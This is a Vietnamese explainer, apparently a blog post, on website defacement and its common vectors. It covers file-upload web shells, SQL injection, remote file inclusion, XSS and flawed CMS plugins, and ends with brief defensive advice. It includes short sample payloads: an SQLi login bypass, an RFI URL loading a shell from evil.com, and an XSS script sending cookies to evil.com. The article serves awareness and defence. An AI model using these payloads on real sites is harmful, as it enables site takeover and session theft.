Tấn công deface là gì​?

Tấn công deface (hay còn gọi là defacement attack) là một hình thức tấn công mạng nhằm thay đổi giao diện, nội dung hoặc chức năng của một website – thường là trang chủ – mà không có sự cho phép của quản trị viên. Đây là một kiểu tấn công phổ biến nhằm vào các website có lỗ hổng bảo mật, đặc biệt là các trang web sử dụng hệ thống quản lý nội dung (CMS) như WordPress, Joomla, v.v.

Tấn công deface thường thực hiện qua những lỗ hổng sau:

• Lỗ hổng Tải tệp độc hại (File Upload Vulnerability
• SQL Injection (SQLi)
• Remote File Inclusion (RFI)
• Cross-Site Scripting (XSS)

Ok và chúng ta sẽ tìm hiểu từng kiểu tấn công deface một cách cụ thể.

* Cách dạng tấn công deface?

 

 

Dạng 1: Tải Tệp Độc Hại (Unrestricted File Upload):

Kẻ tấn công lợi dụng chức năng upload của website (ví dụ: tải ảnh đại diện, tệp tài liệu…) để tải lên các tệp chứa mã độc, thường là web shell (ví dụ c99.php, b374k.php, cmd.php).

Cách hoạt động:

• Hacker upload một file như shell.php qua giao diện người dùng.
• Nếu máy chủ không kiểm tra kỹ định dạng hoặc nội dung tệp, file sẽ được lưu lại.
• Hacker truy cập file đó qua URL: http://example.com/uploads/shell.php
• Shell mở giao diện điều khiển từ xa – hacker có thể xem, sửa, xóa file hệ thống.

Và để lại hậu quả đó là:

• Toàn quyền kiểm soát máy chủ.
• Thay đổi giao diện, nội dung website.
• Gắn mã độc, chuyển hướng người dùng, hoặc đào tiền ảo.

 

Dạng 2: SQL Injection (SQLi)

Hacker chèn các đoạn mã SQL vào biểu mẫu nhập liệu (form đăng nhập, tìm kiếm,…) để điều khiển truy vấn SQL phía máy chủ. Ví dụ payload: ‘ OR 1=1; —

Cách hoạt động:

Trường hợp form đăng nhập:

• Câu lệnh SQL bị chèn thêm khiến điều kiện kiểm tra luôn đúng.
• Hacker có thể đăng nhập không cần mật khẩu.

Có thể trích xuất dữ liệu, chỉnh sửa hoặc xóa bảng chứa nội dung website.

Hậu quả:

• Deface bằng cách sửa dữ liệu hiển thị.
• Truy cập trái phép tài khoản quản trị.

 

Dạng 3:  Remote File Inclusion (RFI)

Trang web cho phép người dùng nhập URL để nhúng file (thường thấy ở các trang load nội dung động), nhưng không kiểm soát nguồn. ví dụ: <?php include($_GET[‘page’]); ?>. Gọi: http://example.com/index.php?page=http://evil.com/shell.txt

• Mã độc được tải từ evil.com và thực thi trực tiếp trên server.

• Chiếm quyền điều khiển máy chủ từ xa.
• Cài đặt shell, sửa đổi giao diện trang.

 

Dạng 4: Cross-Site Scripting (XSS)

 

Kẻ tấn công chèn mã JavaScript vào các trường nhập liệu, và mã này thực thi trên trình duyệt của người dùng khi họ truy cập.  <script>document.location=’http://evil.com/steal?cookie=’+document.cookie</script>

Cách hoạt động:

• Nếu trang web không lọc nội dung nhập vào, mã này sẽ được hiển thị lại cho người khác (ví dụ: trong phần bình luận).
• Khi admin truy cập, cookie hoặc session bị đánh cắp → chiếm quyền quản trị.

 

Hậu quả:

• Deface thông qua việc chiếm tài khoản admin.
• Cài mã độc hoặc chuyển hướng trang.

 

Dạng 5: Lỗi trong CMS hoặc Plugin

Các hệ thống như WordPress, Joomla, Drupal sử dụng nhiều plugin có thể bị lỗi, ví dụ:

• Plugin cho phép upload không kiểm tra định dạng file.
• Lỗi CSRF/XSS trong giao diện quản trị.
• Cấu hình sai dẫn đến lộ mật khẩu API hoặc key truy cập admin.

 

Ví dụ plugin lỗi thời:

• revslider (trong WordPress) từng bị RFI nghiêm trọng.

Hậu quả:

• Hacker có thể deface thông qua giao diện CMS hoặc Shell đã được cài.

* Cuối cùng:

 

Tấn công deface không chỉ gây thiệt hại về mặt hình ảnh và uy tín cho cá nhân, tổ chức mà còn tiềm ẩn những rủi ro nghiêm trọng về bảo mật và dữ liệu. Việc hiểu rõ các kiểu tấn công như tải tệp độc hại, SQL Injection, Remote File Inclusion, hay XSS sẽ giúp quản trị viên web và lập trình viên có cái nhìn toàn diện hơn về các nguy cơ tiềm ẩn. Để phòng ngừa hiệu quả, cần kết hợp giữa việc kiểm tra bảo mật định kỳ, cập nhật hệ thống, sử dụng mật khẩu mạnh, và thiết lập chính sách phân quyền chặt chẽ. Trong một thế giới số ngày càng mở rộng, an toàn thông tin phải là ưu tiên hàng đầu.